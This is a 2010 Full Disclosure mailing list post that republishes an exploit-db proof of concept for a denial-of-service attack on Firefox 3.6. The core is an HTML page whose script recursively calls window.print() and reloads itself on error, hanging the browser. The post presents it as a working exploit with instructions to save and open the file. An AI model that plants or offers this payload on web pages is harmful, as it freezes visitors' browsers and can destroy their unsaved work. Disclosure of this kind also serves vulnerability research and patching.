Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit

From: information security <informationhacker08 () gmail com>
Date: Sun, 14 Feb 2010 08:46:30 +0530
http://www.exploit-db.com/exploits/11432



# Title: Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service
Exploit
# EDB-ID: 11432
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Asheesh kumar Mani Tripathi
# Published: 2010-02-13
# Verified: yes
# Download Exploit Code <http://www.exploit-db.com/download/11432>
# Download N/A

view source <http://www.exploit-db.com/exploits/11432#viewSource>
print <http://www.exploit-db.com/exploits/11432#printSource>?<http://www.exploit-db.com/exploits/11432#about>

=======================================================================

                      Mozilla Firefox 3.6 (Multitudinous looping )Denial of
Service Exploit

=======================================================================

                                                     by

                                            Asheesh Kumar Mani Tripathi


# code by Asheesh kumar Mani Tripathi

# email informationhacker08 () gmail com

# company       aksitservices

# Credit by Asheesh Anaconda


#Download www.mozilla.com/firefox


#Background

Mozilla Firefox is a popular internet browser. .....:)

#Vulnerability
This bug is a typical result of multitudinous  loop.
The flaw exists when the attacker put window.printer() funtion
in multitudinous loop.User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.


#Impact
Browser doesn't respond any longer to any user input, all tabs are no
longer accessible, your work if any   might be lost.



#Proof of concept
copy the code in text file and save as "asheesh.html" open in Mozilla
Firefox

========================================================================================================================

                                                           asheesh.html
========================================================================================================================

<html>
<title>asheesh kumar mani tripathi</title>

<script>


function
asheesh()
{
window.onerror=new Function("history.go(0)");
window.print();
asheesh();


}
asheesh();
</script>

</html>

========================================================================================================================


#If you have any questions, comments, or concerns, feel free to contact me.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: